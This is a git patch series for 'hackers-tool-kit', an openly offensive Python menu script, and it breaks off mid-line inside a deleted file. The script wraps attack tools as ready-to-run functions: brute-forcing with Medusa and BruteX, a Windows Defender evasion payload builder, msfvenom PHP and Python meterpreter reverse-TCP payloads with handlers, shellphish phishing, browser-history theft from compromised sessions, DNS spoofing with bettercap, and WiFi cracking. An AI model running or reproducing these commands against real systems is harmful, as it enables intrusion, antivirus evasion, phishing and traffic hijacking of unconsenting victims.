hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#REFRESH BANNER START# +#--------------------# +def banner(): + os.system("clear") + mainbanner() +#------------------# +#REFRESH BANNER END# + + +#PHP PAYLOAD START# +#-----------------# +def phpload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> phpload.rc') + os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') + os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) + os.system('echo "exploit\n" >> phpload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r phpload.rc') + os.system('rm -rf phpload.rc') + if yn == "n": + os.system('echo " "') +#---------------# +#PHP PAYLOAD END# + + +#PYLOAD START# +#------------# +def pyload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> pyload.rc') + os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') + os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) + os.system('echo "exploit\n" >> pyload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r pyload.rc') + os.system('rm -rf pyload.rc') + if yn == "n": + os.system('echo " "') +#----------# +#PYLOAD END# + + +#FOXHIS START# +#------------# +def foxhis(): + os.system('echo "sessions\n" >> foxhisses.rc') + os.system('echo "exit\n" >> foxhisses.rc') + os.system("service postgresql restart") + os.system('msfconsole -q -r foxhisses.rc') + os.system('rm -rf foxhisses.rc') + print "\n" + ses = raw_input("Session: ") + print "\nMaximum time (seconds) to wait for a response\n" + time = raw_input("Timeout: ") + os.system('echo "use firefox/gather/history\n" >> foxhis.rc') + os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) + os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) + os.system('echo "run\n" >> foxhis.rc') + os.system('msfconsole -q -r foxhis.rc') + os.system('rm -fr foxhis.rc') +#----------# +#FOXHIS END# + + +#RHAWK START# +#-----------# +def rhawk(): + os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") +#---------# +#RHAWK END# + + +#NANO START# +#----------# +def nano(): + print "opening nano in \033[93m/root/\033[0m folder" + os.system("sleep 2") + os.system("cd /root/ && nano") +#--------# +#NANO END# + + +#UPDATE HACKERS-TOOL-KIT START# +#-----------------------------# +def update(): + os.system("cd /root/hackers-tool-kit/ && python htkupdate.py") +#---------------------------# +#UPDATE HACKERS-TOOL-KIT END# + +#COMPILE C START# +#---------------# +def compilec(): + print "filename / filepath" + r = raw_input("> ") + print "\nfilename2 / filepath2" + h = raw_input("> ") + + a = 'g++ {0} -o {1}'.format(r,h) + os.system(a) +#COMPILE C END# +#-------------# + +#DNS SPOOF START# +#---------------# +def dnsspoof(): + target = raw_input("\033[1mTarget:\033[0m ") + domain1 = raw_input("\033[1mDomain1:\033[0m ") + domain2 = raw_input("\033[1mDomain2:\033[0m ") + os.system('echo "net.sniff on\n" >> dns.cap') + os.system('echo "set dns.spoof.domains {0},{1}\n" >> dns.cap'.format(domain1,domain2)) + os.system('echo "set dns.spoof.address {0}\n" >> dns.cap'.format(target)) + os.system('echo "dns.spoof on\n" >> dns.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet dns.cap") + os.system("rm dns.cap") + +def dnsspoofall(): + domain1 = raw_input("\033[1mDomain1:\033[0m ") + domain2 = raw_input("\033[1mDomain2:\033[0m ") + os.system('echo "net.sniff on\n" >> dnsall.cap') + os.system('echo "set dns.spoof.domains {0},{1}\n" >> dnsall.cap'.format(domain1,domain2)) + os.system('echo "set dns.spoof.all true\n" >> dnsall.cap') + os.system('echo "dns.spoof on\n" >> dnsall.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet dnsall.cap") + os.system("rm dnsall.cap") + + +#-------------# +#DNS SPOOF END# + + +#REBOOT HTK START# +#----------# +def reboot(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() +#--------------# +#REBOOT HTK END# + + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + try: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit": + print "\nfollow @tuf_unkn0wn on instagram" + print "\nExiting..." + break + os.system("service tor stop") + os.system("service postgresql stop") + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + if x == "banner": + banner() + if x == "phpload": + phpload() + if x == "pyload": + pyload() + if x == "foxhis": + foxhis() + if x == "rhawk": + rhawk() + if x == "nano": + nano() + if x == "update": + update() + if x == "compilec": + compilec() + if x == "dnsspoof": + dnsspoof() + if x == "dnsspoofall": + dnsspoofall() + if x == "htk-lite": + os.system("python /root/hackers-tool-kit/htk-lite/htkl.py") + if x == "reboot": + reboot() + if x == "specscan": + specscan() + + except: + print "\nfollow @tuf_unkn0wn on instagram" + print "\nExiting..." + break + os.system("service tor stop") + os.system("service postgresql stop") + found = True + +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From f54a59bf44406b901593c069af7c0eca9d6cb9c6 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 22 Apr 2020 04:02:50 -0400 Subject: [PATCH 212/214] Update install.py --- install.py | 50 +++++++++++++++++++++++++------------------------- 1 file changed, 25 insertions(+), 25 deletions(-) diff --git a/install.py b/install.py index b428b14..07593da 100644 --- a/install.py +++ b/install.py @@ -14,30 +14,30 @@ def install(): os.system("cd /root && git clone https://github.com/thelinuxchoice/shellphish") os.system("cd /root && git clone https://github.com/1N3/BruteX") os.system("cd /root/BruteX && ./install.sh") - os.system("pip install mechanize") - os.system("pip install json") - os.system("pip install whois") - os.system("pip install python-whois") - os.system("pip install requests") - os.system("pip install bs4") - os.system("pip install tkinter") - os.system("pip install requests[socks]") - os.system("pip install urlparse") - os.system("pip install cookielib") - os.system("pip install scapy") - os.system("pip install datetime") - os.system("pip install argparse") - os.system("pip install re") - os.system("pip install threading") - os.system("pip install urllib2") - os.system("pip install modules") - os.system("pip install builtwith") - os.system("pip install smtplib") - os.system("pip install whois") - os.system("pip install builtwith") - os.system("pip install colorama") - os.system("pip install dnspython") - os.system("pip install shodan") + os.system("pip22 install mechanize") + os.system("pip2 install json") + os.system("pip2 install whois") + os.system("pip2 install python-whois") + os.system("pip2 install requests") + os.system("pip2 install bs4") + os.system("pip2 install tkinter") + os.system("pip2 install requests[socks]") + os.system("pip2 install urlparse") + os.system("pip2 install cookielib") + os.system("pip2 install scapy") + os.system("pip2 install datetime") + os.system("pip2 install argparse") + os.system("pip2 install re") + os.system("pip2 install threading") + os.system("pip2 install urllib2") + os.system("pip2 install modules") + os.system("pip2 install builtwith") + os.system("pip2 install smtplib") + os.system("pip2 install whois") + os.system("pip2 install builtwith") + os.system("pip2 install colorama") + os.system("pip2 install dnspython") + os.system("pip2 install shodan") os.system("apt install python-socks -y") os.system("apt install nmap -y") os.system("apt install php -y") @@ -58,6 +58,6 @@ def install(): os.system("apt install wifite -y") os.system("apt install reaver -y") os.system("apt install aircrack-ng -y") - os.system("cd /root/social-engineer-toolkit && pip install -r requirements.txt") + os.system("cd /root/social-engineer-toolkit && pip2 install -r requirements.txt") os.system("python /root/social-engineer-toolkit/setup.py install") install() From f0842d49beda30bed6c3d32e08234491d5a7b1f5 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 22 Apr 2020 04:29:18 -0400 Subject: [PATCH 213/214] Delete htk.py --- htk.py | 3463 -------------------------------------------------------- 1 file changed, 3463 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 78736b4..0000000 --- a/htk.py +++ /dev/null @@ -1,3463 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @tuf_unkn0wn -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @tuf_unkn0wn -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" - - -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ 